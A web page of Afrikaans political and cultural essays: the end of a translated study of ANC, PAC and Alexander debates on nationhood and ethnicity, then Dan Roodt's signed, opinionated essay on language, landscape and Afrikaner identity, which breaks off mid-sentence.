Harold Wolpe vergelyk nasionale bevryding met vordering na sosialisme (id., 64), en Francis Meli benadruk weer dat daar sonder die nasionale bevryding van swart mense, nie sosialisme in Suid Afrika moontlik is nie (id., p. 72). Kader Asmal gebruik Resolusie 566 van die VN i.v.m. die herstel van die reg tot algehele selfbeskikking om aan te toon dat hier, volgens hom, ‘n flagrante geval van wederregtelike betreding van nasionale soewereiniteit is. Selfs al behels die opeis van burgerregte ‘n spesiale kategorie – soos in die geval van die Vereenigde State – stel die spesifieke soort kolonialisme waaraan Suidafrikaners blootgestel word, hulle in staat om restitusie van rykdom, grond, kultuur, eer…. kortom, volle nasionale soewereiniteit, te eis (id., p. 135).

Laastens voel Pallo Jordan dat ‘n nasie sigself nie in klaargemaakte begrippe, afkomstig uit sekere universiteitkringe, herken nie, maar dat dit ‘n produk van wil en ondersteuning van ‘n gesamentlike projek is waarin nie ras òf kleur ‘n rol speel nie. Die enigste ware rassiste is dan dié wat hulself uitsluit uit iets wat amper lyk na Asmal se Jakobynse idee van soewereiniteit. Net vir ingeval daar nog hoegenaamd enige twyfel bestaan oor wie soewereiniteit mag opeis, word daar na die nasionale groepe wat in die Vryheidshandves genoem word, verwys: “… kulturele diversiteit van die Suidafrikaanse bevolking word erken, maar sonder dat dié idee kategoriese immobiliteit beteken.” Hy sluit af met die volgende oorweging: “Afrika verwerp met rede die idee van afstigting” (id., p. 118).

Ons veronderstel dat wanneer Jordan van Afrika praat, hy na die OAE en sy konstitusionele beleid t.o.v. respek vir grense wat uit die koloniale tydperk oorgeërf is, verwys. ANC-intellektuele het, in elk geval sedert 1912, of selfs sedert die viering van die Handvesalliansie in 1955, ‘n ver pad gekom. Gedurende die sewentiger- en veral tagtigerjare, het die Morogoro-sindroom egter die universiteitstoneel oorheers, ver verby die bakens van handves-militantisme.

Dit wil voorkom asof daar in die Suid-Afrikaanse opposisie tendense was wat in sekere gevalle skynbaar nie sentralisties genoeg was nie, veral ná die ANC, post-Morogoro en sy postulate. Robert Sobukwe se biograaf, Pogrund, dring daarop aan dat sy man nog altyd die opkoms van ‘n sterk nasionale bewussyn waarin swartes saamgesnoer word, aangemoedig het ter ondersteuning van ‘n strydvaardige afrikanisme. Dis seker moontlik dat die nasie-gedagte van die PAC van die begin af meer monochroom as dié van die ANC was, veral omdat hulle op rassegronde daartoe geneig was om, in die praktyk, Indiër, Kleurling, en in die besonder wit minderhede uit te sluit (P. Pogrund, 1990, p.66).

Die bruin intellektueel en simpatiekgesinde van ‘n klein groepie Trotskiste in die Eenheidsbeweging, die onvermoeibare Neville Alexander, neem die ANC onder skoot daaroor. Hy stel drie oplossings vir die nasionale vraagstuk voor:

 • Die verdeling van grondgebied tussen wit en swart in minstens twee state, soos met apartheid:

Die sogenaamde nasies wat voorgee dat hulle Xhosas, Zoeloes, Tswanas, Kleurlinge, Indiërs, ens. verteenwoordig, bestaan nie en geen teorie sal hulle ook verwerklik nie… Die enigste manier vir dié wat voorgee om nasies te wees, om enige soort legitimiteit, soos in Pakistan/Israel, op te eis, is om soos in dié state as teen-rewolusionêre sentra òf as verdeling teenoor gekoloniseerdes van die wêreld te staan” (N. Sizwe, 1979, p. 180).

 • Die skepping van ‘n veelrassige of multi-etniese staat soos deur die ANC en Handvesalliansie uiteengesit aan die einde van die sestigerjare. Volgens Alexander kan só ‘n model net bestaan indien die swart bourgeoisie sterk genoeg is om met ander nasionale bourgeoisieë saam te werk om die rasse- en klasseonderdrukking in die sisteem te bowe te kom. Hoe dit nou ookal sy, vestig die skrywer nogtans ons aandag op die bestaande verskille tussen “nasionalistiese bevryding” en wat hy as ware nasionale bevryding sien.
 • Dit bring ons by die derde model: die skepping van ‘n opregte, vereenigde en sosialistiese nasie, ‘n soewereine Azanië, waar:

die werkersklas eersdaags die bestuurdersklas sal word en waaruit die Suidafrikaanse nasie gevorm sal word… Selfs die volk verwerp die geldigheid van die Nasionale Party e.a. se idees van veelrassigheid en multi-etnisiteit omdat dit verdelend is. Hulle [die volk] sê uitdruklik dat dit wat ‘etniese groepe’ genoem word in der waarheid kleur kastes is òf linguïstiese, godsdienstige of adminitratiewe groepe, en niks meer nie” (id., p. 180).

Om die polemiek mee af te sluit, beloon Alexander die Eenheidsbewegings van die PAC en AZAPO met ‘n gloeiende lofrede omdat hulle die derde model ondersteun en daarmee ‘balkanisering’ van die land vermy. Hy teken egter sterk beswaar teen die Sowjet teoretici, in die SAKP en Congress, aan (Potekhin veral). Eerstens omdat hulle eintlik die idee van stam ondersteun en verder omdat hulle ná afloop van Morogoro – met sy spesifieke soort kolonialisme – ‘n dualistiese model wat aan segregasie herinner, voorstaan.

Vir Joe Slovo wat op Alexander se verwoede aanval reageer, is:

Kolonialisme van ‘n spesifieke soort is [nie] ‘n postulaat vir die bestaan van twee afsonderlike nasies – wit en swart – [nie]. Die heersersklas in sy geheel is nie uitsluitlik blank nie [hoewel dit natuurlik is ‘n indo-europese soort een is]… Anti-wit chauvinisme sal ook nie in ‘n beter lig gestel word as dit ‘n idee is wat op ‘n mite berus nie. Die rewolusionêre klasse sal vinniger vordering maak in die stryd vir ‘n enkele nasionale toestand as hulle besef dat ons nog nie ‘n nasie is nie, maar moet veg sodat dit ‘n werklikheid kan word” (M. Van Diepen, 1988, p. 150).

Dit is in dié terme dat die debat die tagtigerjare binne bars en ‘n kompetisie ontketen waarvan die oogmerk is om te sien met hoeveel oorgawe enige denker of groepering die eenheidsgedagte kan laat seëvier. Onder die invloed van die psigologiese en kuturele afrikanisme van “Swart Bewussyn”, was die mode om ‘n energieke patriotisme op swart trots te fundeer wat dan monolities en uitdagend Pretoria se “balkanisering” die hoof moes bied. (Ten spyte daarvan dat sy stigter, Steve Biko, vermoor is, het sy intellektuele en politieke nalatenskap deels bly voortleef onder AZAPO se vaandel.)

Boodskappers stel hulle ten doel om die gedagte op absoluut enige moontlike manier oor te dra, soos in die geval van Can Themba, ‘n Drum-generasie skrywer en joernalis:

As gevolg van die ANC se pogings, asook industriële en demografiese veranderinge in die land, en die tendens in wit politiek om te veel op kleur aan te dring, voel Afrikane… asof hulle ‘n nasie vorm – ten spyte van wat die gidse van die Inligtingskantoor van die Regering sê” (C. Themba, 1972, p. 115).

Michael Attwell, politoloog, beaam dit: “’n Gevoel van nasionale identiteit het hier en daar posgevat, maar nogtans posgevat” (M. Atwell, 1986, p. 171). Desmond Tutu, kerklike en politieke aktivis voeg daarby dat:

In Soweto [het] ons nog altyd in harmonie saam[ge]leef. Ek is Xhosa en my bure is Zoeloes, Swazis, Pedis, Tswanas. As ons baklei is dit omdat ons jaloers is op iemand anders se nuwe klere. Ons het nog nooit in Soweto oor stamverskille slaags geraak nie” (C.E. Cobb, 1993, p. 69).

Dis miskien waar, maar dit begin verdag lyk om só daarop aan te dring. En dis ook nie bó verdenking dat die etniese vraagstuk – of dan stamvraagstuk – gedurende die sestigerjare geheel en al ‘n taboe-onderwerp raak nie. Die siniese afleiding wat ‘n mens daaruit kan maak is dat die meeste groeperinge in die opposisie en ook in die Handvesalliansie se retoriek na een ding lyk en die naakte waarheid ‘n hele ander storie is. Selfs nie eers die amptelike weergawe is heeltmal verwaterdig nie en ‘n mens word deeglik bewus van die mate waartoe etniese konflik ‘n aansienlike rol in die gang van die Congress gespeel het, asook in sy verhoudings met ander organisasies.

In dié verband is byna alle getuienis by wyse van mondelinge verklarings gedoen en kan daarom nie gekontroleer word nie. Boonop is sulke verklarings dikwels onbetroubaar en lok dit talle voorbehoude uit. ‘n ANC-spesialis het, sonder om in enige détail daarop in te gaan, egter aan ons bevestig dat daar sonder twyfel vyf kommissies van ondersoek aangaande etniese konflik binne die beweging was tydens sy ballingskap. Hy maak ons ook daarop attent dat die Nguni-element sedert die sestigerjare in die bestuur oorheers (Xhosa om presies te wees; dit sluit Mandela, Sisulu, Tambo, Mbeki en Nzo in), terwyl die PAC meerendeels ‘n Sotho-element, of die Noorde, verteenwoordig (Sobukwe, Leballo, Madzunya). In sy analise doen hy aan die hand dat dit vanweë die feit dat stamme in die Noorde, veral in Transvaal, histories gesproke uitgelewer aan die Boere was, terwyl die Nguni-groepe in die Suide weer meer geredelik die Britse liberale tradisie aan die Kaap aanvaar het en dus daarom ‘n oper houding t.o.v. rasseprobleme gehad het.

Tom Lodge, wat eweneens op mondelinge getuienis staatmaak, onderskryf grootliks die bogenoemde hipotese en voeg by dat soos met die voorvalle tussen Sotho-mynwerkers en gematigdes in Transvaa.l, die PAC etniese mobilisering tot sy voordeel gebruik. Volgens hom, lééf ondersteuners op grondvlak hul identiteit uit, terwyl die bestuur van die Congress enige etniese etiket afwys. Hierdie verskynsel kom spesifiek tydens die onrus tussen die Transkei en Sekhukhuneland aan die einde van die vyftigerjare na vore.

Die botsing tussen identiteite, soos ons later gesien het, neem ‘n ernstige wending in Natal met die belangestryd tussen Inkatha en groepe wat die ANC goedgesind is. Die aantygings teen Buthlezi dat hy Zoeloe-trots gemanipuleer het, is welbekend. Minder van ‘n ophef is egter gemaak oor Zoeloe-hoofde se skeltaal teen die Xhosa-hegemonie en hul Pondo neefs binne die Congress, wat dit natuurlik nie van mindere belang maak nie (G. Mare, 1992).

Stephen Ellis beklemtoon in Comrades against apartheid die etniese wrywing in die Congress-alliansie. Hy is van die min outeurs wat wel sonder meer daarna verwys, al is dit vlugtig. Só spoor hy die gevalle van onmin tussen die Tswanas en Xhosas in die ANC ná, wat aanleiding gegee het daartoe dat eersgenoemde ‘n minderheid teenoor die ander groep in die belangrikste liggame van besluitneming gevorm het (S Ellis en T. Sechaba, 1992, p. 177 – 178). Hy bring kritiek teen Tambo omdat dié Xhosas voortrek (id., p. 41-42) asook teen die konfrontasies in die SAKP, waar die sekretaris-generaal, Moses Mabhida, van Zoeloe-oorsprong, met moeite ‘n onmoontlike etniese balans probeer handhaaf.

Uit die Frans vertaal deur Karin Bredenkamp

Taal, landskap en identiteit

Download PDF
Download PDF
Download PDF

Dan Roodt

Die kwessie rondom taal is besig om dié aangaande ras te vervang as die belangrikste enkele strydpunt in Suid-Afrika. Selfs gedurende die grondwetlike onderhandelinge tussen die Nasionale Party en die ANC tydens die aanloop tot die 1994-verkiesing het slegs drie vraagstukke hul onderskeie standpunte geskei, naamlik eiendomsreg, die sogenaamde uitsluitingsklousule (waarvolgens ’n werkgewer stakende werkers kon uitsluit), en natuurlik, die reg op, of soos dit geblyk het, die keuse van moedertaalonderrig in staatskole. Die berugte rassevraagstuk het nie eens ter sprake gekom nie, wat sekerlik vreemd mag aandoen aan enigiemand buite Suid-Afrika waar rassesegregasie of die woord “apartheid” ewe beskrywend van ons geag word as byvoorbeeld “rewolusie” van Frankryk.

Maar dit wat hier volg, is geen politieke geskrif of poging om tot ’n politieke debat toe te tree nie, hoe gepolitiseer die taalkwessie in Suid-Afrika ook al mag wees. In die eerste plaas gaan dit vir my om ’n besinning oor ’n ervaring van vreemdelingskap in my eie land, ’n soort interne eksiel of ballingskap waarmee ek daagliks as nie-Engelse persoon gekonfronteer word. Op pad tussen Stellenbosch en Franschhoek, in een van die oudste en mees oorwegend Afrikaanse dele in die land, sien ek ’n reusagtige groot padteken wat tweetalig in Engels en Xhosa aangebring is. Op my paspoort is daar deesdae net Engels en Frans, wat my daaraan herinner dat die Suid-Afrikaanse staat kwalik meer Afrikaans as taal erken, hoewel dit in naam steeds een van elf amptelike tale is. Rondom my is daar vele Afrikaners, vele stoere Afrikaners moet ’n mens byvoeg, wat angsvallig besig is om hul kinders in Engels op te voed, kinders met name soos “Justin” en “Megan”, asof die ouers reeds geestelik verhuis het na ’n Engelssprekende land en nie hul spruite met onuitspreekbare Germaans-klinkende name wou opsaal nie.

’n Kafkaeske waas kleef aan dit alles, asof ons almal skuldig is aan ’n onnoembare misdaad en nou daarvoor moet boetedoen deur ontneem te word van ons kulturele burgerskap. Die verskriklike gemeenplaas “apartheid” het sekerlik iets daarmee te doen, maar verduidelik nogtans nie alles nie. Buitendien ervaar ek reeds jare lank hierdie Afrikaanse woord as iets vreemds en onsinnigs, ’n versameling letters wat ek vir die eerste keer gesien het toe ek ’n straat oorsteek in ’n vreemde stad in ’n vreemde land waar dit skielik in wit op die pad geverf voor my opgedoem het.

Denke oor taal en kultuur in Suid-Afrika behaal sy absurdste hoogtepunte juis op amptelike of kwasi-amptelike vlak. In hierdie verband herinner ’n mens jou die uitspraak van regter Johann Kriegler wat beweer het dat indien twee Yslandse kinders ’n Afrikaanse skool sou bywoon, die hele skool sy onderrigmedium na Yslands behoort te verander. Miskien is Ysland hier ’n metafoor vir die amptelike kilheid jeens Afrikaans, of miskien was dit ’n subtiele manier om te sê dat Afrikaans net soos Oud-Yslands, daardie belangrike literêre taal van die sages, sou kon vergaan om iewers in die toekoms net deur spesialiste begryp te word.

Ek sou graag hier wou aanhaal uit die Oud-Yslands, maar as ’n plaasvervanger deel ek graag met die leser die volgende frase van Reinhart die Vos in die Middel-Nederlandse weergawe:

Het staet so, suldi hebbe vrome,
Hier ne mach zijn geen langher staen.
Volghet mi, ic sal voeren gaen.
Wi houden desen crommen pat,

wat rofweg die volgende beteken: “ons kom nêrens deur langer te talm nie, volg my, ek gaan voor, ons neem dié kronkelende pad.” Omdat ons Reinhart ken, weet ons dat dit ietwat riskant is om enige kronkelende pad met hom aan te durf. Só ook die huidige teks, wat begin met ’n kronkelende rit per motor tussen Johannesburg en die Hartebeespoortdam, ’n heel opwindende tog deur rante en klowe wat met aalwyne, verknoetste kareebome en rotsblokke van ysterklip besaai is, brûe oor spruite en riviere, asook skielike draaie en hoogtes wat teen ’n sekere spoed ontstemmend kan raak.

Niks kan meer skokkend wees in die Franse sin van chocquant, as juis die oorgang vanaf, sê maar, Sandton City of die Rosebank Mall, na die Magaliesberg via daardie kronkelpad nie. ’n Mens sou dit ’n Proustiaanse verplasing kon noem, dog sonder om reg aan Proust te laat geskied aangesien syne nooit per motor plaagevind het nie, slegs per trein. Die Europese reisiger is gewoond daaraan om vir twee ure te ry en agterna hom in ’n ander land te bevind, met ’n ander taal, ’n ander mentaliteit, ander gewoontes, kookkuns, gebare, plekname wat moeilik is om uit te spreek. Anderkant die Hartebeespoortdam lê distrikte soos Elandskraal, Mooinooi, die dorpe Rustenburg en Brits, die “diep platteland” soos dit bekend was in die politieke joernalistiek van die ou Suid-Afrika. Dog, anders as op die Europese Vasteland, heg die welaf Engelse inwoners van noordelike Johannesburg nóg waarde aan die kultuur, die taal, die kookkuns, die geskiedenis van hul bure agter die berg, nóg toon hulle hoegenaamd enige belangstelling daarin. Op ’n manier is hulle soos Brittanje se Euroskeptici: hulle staan vyandig teenoor die nie-Engelse, hulle vrees hul komplekse gewoontes en gevoelighede, hulle verag hul gebrek aan Engelse gesonde verstand (“common sense”). ’n Mens kan nie anders as om ’n verband te sien tussen Me Metcalfe se veldtog vir die Engelse taal in skole en die stelling ’n rukkie terug van mnr John Major, toe nog leier van die Tories, dat “Engeland die baarmoeder van die Westerse beskawing” is nie. Vergeet van die Grieke, die Romeine, die Italianers, die Franse, die Duitsers, slegs Engeland het kaart en transport vir die Westerse erfenis.

Daar is tekens dat die platteland — daardie ironiese term vir dit wat onplat voor ons uitstrek — en sy kultuur wat veel meer omvat as bloot die Afrikaanse taal, voortaan aan ’n destruktiewe vorm van herkolonisering, afrikanisering, noem dit wat jy wil, onderwerp gaan word, iets wat na my mening verreikende implikasies het nie net vir die Suid-Afrikaanse kultuur as geheel nie, maar vir ons syn en wese in Suid-Afrika.

Heidegger in sy reaksie op die onafwendbare indringing van tegnologie binne die menslike bestaan het twee houdings geformuleer wat ons behoort in te neem en wat ons mag red as denkende wesens met ’n estetiese projek op aarde. Die eerste is “Gelassenheit zu den Dingen1, wat letterlik in Afrikaans vertaal kan word as “gelatenheid teenoor dinge”. Dit is ’n manier van beide ja en nee te sê teenoor die veranderinge, tegnologies en andersins, wat ’n uitwerking op ons het. Die tweede houding is “Öffenheit für das Geheimnis”, wat weer eens letterlik “oopheid teenoor die geheimenis” beteken. Beide hierdie opvattinge het betrekking op die menslike wese as ’n gewortelde entiteit, gewortel ook in sy geboorteland, sy “pays” soos die Franse sê. Heidegger haal die Duitse digter Johann Peter Hebel aan waar hy sê:

Ons is plante wat — of ons dit wel erken of nie — met ons wortels uit die aarde moet opgroei ten einde in die eter te bloei en vrugte te dra.

Die koloniale ervaring is ’n ontwortelde en ontwortelende, wat in die huidige konteks die estetiese armoede van koloniale kultuur verklaar. Die eindelose moralisme en stereotipering van wat veral in die buiteland bekend staan as “South African literature” val na my mening binne die kategorie van koloniale kultuur. Daarteenoor staan iets soos die onlangse werke van Karel Schoeman, veral die roman Hierdie Lewe 2, wat ’n hoë vlak van “Öffenheit für das Geheimnis” openbaar in die gevoelvolle beskrywings van die Karoo 3, die uitgestrektheid van die landskap en die ongenaakbaarheid van die karakters. Dit lyk asof hy iets vasvang van die tragedie van ’n Karoobestaan tydens die vorige eeu, en by uitbreiding, van die hele platteland. Historici het al dikwels aanmerkings gemaak oor die ekonomiese wankelrigheid van ’n plattelandse bestaan in Suid-Afrika, die gebrek aan standhoudende en voorspelbare reënval, wat tot die nomadisme van beide die Trekboere en swart stamme uit vorige eeue gelei het. Om dus die landskap te beskou is om in ’n sekere sin jou oë te laat gaan oor ’n Leidensgeschichte, die bitter geskiedenis van soveel pogings om te oorleef op meesal droë of brak grond.

Die geskiedenis van Engels in Suid-Afrika is, behalwe Natal, hoofsaaklik ’n stedelike verhaal, sonder woorde om die besonderhede van ons landskap met sy “koppies” en “rante” uit te druk, sy “klowe” en “skeure”, en geen plekname wat die wanhoop van “Putsonderwater” vervat, of die waterobsessies wat hul in soveel “-fonteine” en “-spruiteoor” die hele land herhaal. Die verhaal van die platteland is duidelik ’n Afrikaanse, en die paring van taal en landskap oor die eeue heen het ’n spesifiek plaaslike kultuur geproduseer, wat uiteindelik groot gewig behoort te hê binne die hutspot van ’n Suid-Afrikaanse kultuur. In die mate waartoe Afrikaners en Suid-Afrikaanse swartes tot die Engelse kultuur bydra, staan hulle in dieselfde verhouding tot Engeland as die Skotte, die Walliesers en die Iere: die grootsheid van Engelse of Britse kultuur, ten minste sover dit die letterkunde betref, is te wyte aan die pogings van kunstenaars en skrywers vanuit die geledere van die oorwonne volke wat poog om hul eie sin van waardeloosheid en minderwaardigheid te besweer deur die voortreflikheid van hul werke.

Die Engelse media, en veral die dommer-as-dom buitelandse media, stel die platteland voor as die ligging van wit fascisme, enersyds, en swart armoede, andersyds. Kultureel gesproke is dit ontdaan van enige belang. En tog, tensy ’n mens aan ’n laat vorm van sosiale realisme glo, kan alle fasette van menslike bestaan nie gepolitiseer word nie. As die monochroombril van sosio-politieke cliché afgehaal word, raak die platteland inderdaad kleurvol, welluidend met die stemme van ongekunstelde dog goedgeaarde mense.

Die fassinasie van die volk, le peuple, das Volk, the people, vir intellektuele is bespreek deur Jacques Rancière in sy boek Courts voyages au pays du peuple 4 — “Kort reise deur die land van die volk.” Volgens hom is die platteland baie nader aan ons as wat ons vermoed:

ces contreés toutes proches qui offrent au visiteur l’image d’un autre monde. De l’autre côté du détroit, un peu à l’écart du fleuve et de la grand-route, au bout de la ligne des transports urbains, vit un autre peuple, à moins que ce ne soit simplement le peuple. Le spectacle imprévu dúne autre humanité s’offre sous ses diverses figures: retour à l’origine, descente aux enfers, avènement de la terre promise. 5

[hierdie nabygeleë kontreie wat aan die besoeker ’n blik op ’n ander wêreld bied. Oorkant die détroit, ietwat verwyder van die rivier of die grootpad, aan die einde van die stedelike vervoerstelsel, leef ’n ander volk, ’n mens sou sover kon gaan om te sê: die volk. Die onverwagse skouspel van ’n ander mensdom bied hom in verskeie vorme aan: terugkeer na die oorsprong, hellevaart, koms van die beloofde land.]

Ten spyte van die kultuurapartheid van die nuwe Suid-Afrika wat die platteland wil amputeer ten behoewe van ’n stedelike Engelse en grotendeels ingevoerde Hollywoodkultuur, herken ons die volk as Afrikaans. Selfs die swartes hier praat Afrikaans. Eugène Marais se Waterberg, Breyten Breytenbach se Wellington of Bonnievale, dit alles is maar inkarnasies van hierdie l“and van die volk” binne Rancière se definisie. Dit is waar ons wortels heen strek, waaruit die digter sy inspirasie put of waar ons gewoon die modes en pretensie van die stad afskud en weglê aan ’n bredie en wyn wat in ’n blikbeker geskink kan word.

Die platteland en die volk wat dit bewoon, is egter veelduidig, soos ook uit die hierbo-aangehaalde gedeelte blyk: dit kan óf hellevaart óf beloofde land, of selfs iets anders wees. Trouens, die grond, die bodem is ideologies dubbelsinnig. Die grond is enersyds die lokus van identiteit en nasionalisme, selfs fascisme, maar terselfdertyd is dit die eindbestemming van rewolusionêre vooruitgang waar grondlose kleinboere of die proletariaat oplaas weer hervestig kan word sodat hulle die verlore Eden mag terugvind van waar hulle verjaag is deur die kapitalisme, kolonialisme en apartheid. In Duitsland is die Blut und Boden-slagspreuk uit die dertigerjare vervang deur die groen “terug-na-die-natuur”, twee oënskynlik teenoorgestelde bewegings.

In Suid-Afrika word die sin van die grond en by uitbreiding van die platteland verder gekompliseer deur die nomadiese tradisies van die verlede. Die afsku waarmee ’n sedentêre Engels-koloniale bewind die rustelose Trekboere bejeën het, is verwant aan die idee dat hulle besig was om weg te trek van die beskawing as sodanig, dat hulle as ’t ware op vlug geslaan het voor die beskawing self. Hierdie paradoks van Europese nomades word soos volg beskryf deur De Kiewiet in sy History of South Africa 6 waar hy met kenmerkende Engelse afkeur opmerk:

In the long quietude of the eighteenth century the Boer race was formed. In the vast, unmysterious, thirsty landscape of the interior lay the true centre of South African settlement. When the Trekboers entered it with their flocks and tented wagons, they left the current of European life and lost the economic habits of the nations from which they had sprung. Though they never became true nomads, the mark of nomadism was upon them, and their dominant traits were those of a restless and narrow existence. They had the nomad’s appetite for space and possessed the hardness and courage of men of the saddle who watch their flocks and hunt their meat. Their wealth was in their cattle and in their sons and grandsons, who were born numerously and who thrived amazingly. Their life gave them a tenacity of purpose, a power of silent endurance, and the keenest self-respect. But this isolation sank into obstinacy, their power of endurance into resistance to innovation, and their self-respect into suspicion of the foreigner and contempt for their inferiors. For want of formal education and sufficient pastors, they read their Bibles intensively, drawing from the Old Testament, which spoke the authentic language of their lives, a justification of themselves, of their beliefs and their habits. 7

Waarskynlik sou dié teks môre op CNN gelees kon word apropos van Afrikaners vandag, en niemand sou ’n wenkbrou daaroor lig nie. Hierdie beperkte siening van die Boer en die Afrikaner wat neffens die Europese beskawing leef of geleef het, geld nog steeds. Op ’n manier word die platteland of binneland nog altyd gesien as onaanloklik (“forbidding”). Die koloniale afsku vir die binneland en sy inwoners is magistraal beskryf deur Peter Blum in sy satiriese gedig “Rooinekke op Hermanus” wat in jukstaposisie met De Kiewiet se siening aangehaal kan word.

O gestilde
sinnebeeldvoëls, simboolvlerke, jul pryk
teen sononder, klaar met dool, enkel embleem
van hierdie seksie onwilde, ongewilde
vasgemeerde, aarde-agterhaalde ryks-
arende, pensioentrekkers op ou roem,
wat koel staan teenoor óns rumoer, kil-vreemd
— nie aanvoel wat óns bedoel, ín ons woel:
hartstog-verleerde, wrok-onbegrypende
sege-moeg, effens geaffronteerde
see-afkykers, agterland-afgekeerdes
wat hoegenaamd niks nie brandelik begeer. 8

Blum, ’n Duitser, skryf hier in sy aangenome taal, Afrikaans. Dit is miskien ironies dat hy moes doodgaan in ’n gestig in Engeland, tuiste van die rooinekke. In ’n sekere sin is hy ’n vreemdeling wat oor ander vreemdelinge skryf in ’n taal wat deur baie deesdae gesien word as synde ’n vreemde taal in die Engelse Suid-Afrika, iets wat jy net met onderskrifte kan verstaan. In die jargon van die nuwe Suid-Afrika sou Blum nie kwalifiseer vir die benaming “South African writer or poet” nie. Dit is ’n eienaardige verwikkeling aangesien die ryksarende van die gedig, wat hul pensioen trek op ou roem, skynbaar hulself op die oneerbiedige digter gewreek het. Hul gebrek aan hartstog, hul “kil-vreemdheid” het hulle kennelik goed te pas gekom; die digter het nou iets van ’n uitgestorwe spesie geword, nie die ryksarend nie. Maar tydens die gedig — vir ’n oomblik — vier ons die majesteit van daardie innerlike of binnelandse ruimte, daardie land wat Hermanus omring en waarvan die ryksarende as “agterland-afgekeerdes” hulself afgesluit het. Dit is ’n land, die land van die digkuns, waar elkeen en niemand ’n vreemdeling is nie.

De Kiewiet besef waarskynlik nie dat nomadisme en chauvinisme mekaar uitsluit nie, want die nomade bewerkstellig nie ’n verhouding met die grond wat stabiel genoeg is om as outochtoon gereken te word en dus ander as vreemdelinge te sien nie. Die Boere is “obstinaat” omdat hulle nie die Britse bewind wou aanvaar nie, en kultureel nie hulself wou verengels in ’n beskaafde Engelse Suid-Afrika nie. As historikus van die ryksarende bejeën hy hulle met al die chauvinistiese veragting waartoe die beskaafde man in staat is wanneer hy van aangesig tot aangesig met die barbaarse nomade verkeer. En ook: die proses van trek maak van die Boere vreemdelinge-in-wording wat die Westerse beskawing verlaat en sodoende verafrikaans in die mees radikale sin. Op ’n stadium gaan ’n mens die proses moet ondersoek waardeur die Engelse afkeer van Afrika en rassisme wat aanvanklik op barbare van alle rasse en kulture gefokus was, deur ’n Freudiaanse vorm van “oordrag” uitsluitlik tot Afrikanerhaat en veral onderdrukking van die Afrikaanse taal as ’t ware “gedistilleer” is. (Dit is ’n Freudiaans-Lacaniaanse projek-in-die-kleine wat heel prettig mag wees, aangesien “oordrag” ook een van die belangrikste onderliggende konsepte was by daardie resente Amerikaanse mode wat iets met “con” te make het soos in “decon …” en “déconner”, om nie van die “connards” te vergeet nie.)

Die beweging van mense op die grond, en selfs die wortelskiet van hul kultuur, hul taal en die naamgewing wat ontstaan uit hul interaksie en waarneming van die omgewing, die benoeming van bome en voëls en diere, dit alles vind binne menslike tyd plaas. Die landskap verander egter baie stadig, ongemerk binne geologiese tyd wat mensewesens beswaarlik kan voorstel. In ’n sekere sin is menslike kultuur dus vreemd aan die land, en selfs ons spesie is ’n immigrantespesie wat vandag hier mag wees en môre nie meer nie.

Na my mening is daar steeds ’n humanistiese en daarom antropomorfiese element aan Heidegger se begrip van kultuur as ’n vorm van organiese groei, waarna hierbo verwys is. Dit is waar dat kultuur moeilik kan bestaan sonder wortels: die déracinés binne Suid-Afrikaanse konteks woon slegs hier om die lekker inkopies, en hulle migreer maklik na waar die inkopies beter is (of miskien veiliger). Die plattelander, daarenteen, staar ’n bietjie soos Tityrus in Vergilius se eerste Herdersgedig 9 na die grootte van Rome wat oor Naboomspruit toring soos die statige sipres oor die beskeie vibernum, en besluit dat hy die eenvoudige, stoïsynse lewe verkies bo die inkopies te midde van die stadsrumoer. Dog soms het hy geen keuse nie, soos Meliboeus wat van sy grond afgesit is vanweë ’n gebrek aan politieke vriende in Rome. Uiteindelik speel die kans ’n rol daarin of ’n mens toegelaat sal word om aan te bly of gedwing sal word om te vertrek, of ’n mens jou wortels gaan behou of nie. Daar bestaan iets soos ’n taalkundige ekologie, en tale, soos spesies, is besig om uit te sterf. Anders as Darwin se idee van natuurlike seleksie, word die proses van uitsterwing grootliks gedryf deur toevallige gebeure, deur die kans. Die ekologie, taalkundig of andersins, is ’n stogastiese proses. Daar word gesê dat 99,9% van alles spesies wat ooit op aarde bestaan het, reeds uitgesterf het. Die taalkundige verskeidenheid van die platteland mag kwesbaar wees vir die funeste gevolge van ’n toevallige gebeurtenis, wat die vorm van ’n droogte mag aanneem, of die goudprys op $200, of ’n besluit in Rome.

Is ons almal vreemdelinge? Dit is waarskynlik die siening van Julia Kristeva waar sy sê:

Étrangement, l’étranger nous habite : il est la face cachée de notre identité, l’espace qui ruine notre demeure, le temps où s’abîme l’entente et la sympathie. De le reconnaître en nous, nous nous épargnons de le détester en lui-même. Symptôme qui rend précisément le <> problématique, peut-être impossible, l’étranger commence lorsque surgit la conscience de ma différence et s’achève lorsque nous nous reconnaissons tous étrangers, rebelles aux liens et aux communautés. 10

[Vreemd genoeg woon die vreemdeling binne-in ons: hy is die keersy van ons identiteit, die ruimte wat ons tuiste ruïneer, die tyd waarin wedersydse begrip en meegevoel afbreek. Deur dit binne-in ons te herken, vermy ons dit om dieselfde ding in hom te verag. ’n Simptoom wat juis die “ons” problematies maak, miskien selfs onmoontlik, die vreemdeling begin sodra die bewustheid van my andersheid na vore tree en word voltooi sodra ons onsself herken as synde almal vreemdelinge, rebelle teenoor bande en teenoor gemeenskappe.]

In terme hiervan word ’n mens ’n vreemdeling — “volksvreemd”! — sodra jy teen die gemeenskap rebelleer, of selfs bewus raak van jou eie individualisme. Die platteland is geen vreemdeling as dit by rebellie kom nie, gedagtig aan 1914 of Van Melle se Bart Nel 11, maar is miskien minder verdraagsaam teenoor anderse individue as die stad. Aan die ander kant, deur sy andersheid te behou teenoor die imperiale hinterland van nywerheid en handel, sy ekologie te handhaaf, brei die platteland miskien sy dade van rebellie uit. Kollektief is die platteland tot vreemdeling verklaar, wat miskien lig daarop werp waarom vreemdelinge nie so goed behandel word in sy midde nie.

’n Verwante probleem aan dié van vreemdeling-wees (of dié van setlaar en boorling) is dié van suiwerheid. Op verskillende tye sal verskeie “groepe” — ek gebruik doelbewus ’n gelade term uit die onlangse verlede — aanspraak daarop maak om waaragtig inheems te wees. Hulle was eerste daar, dis die land van húl voorvaders, hulle is die meerderheid, of die uitverkore minderheid, wat die geval ook al mag wees. Hierdie aanspraak is van dieselfde tipe as die aanspraak op rassesuiwerheid, want dit veronderstel ’n goddelike of regskape oorsprong. Dus het ons gevorder vanaf ’n ideologie van rassesuiwerheid tot nedersettingsuiwerheid. Die amptelike siening van die Afrikaanse taal het geëvolueer vanaf die siening onder die Britse bewind in die Kaap tydens die negentiende eeu dat dit die resultaat was van ras- en taalvermenging, wat toentertyd afkeurenswaardig was, na die huidige voorstelling van beide die ANC en die Engelstalige media van ’n wit Afrikanertaal wat gestigmatiseer is deur apartheid en gepaardgaande neigings tot rassesuiwerheid en 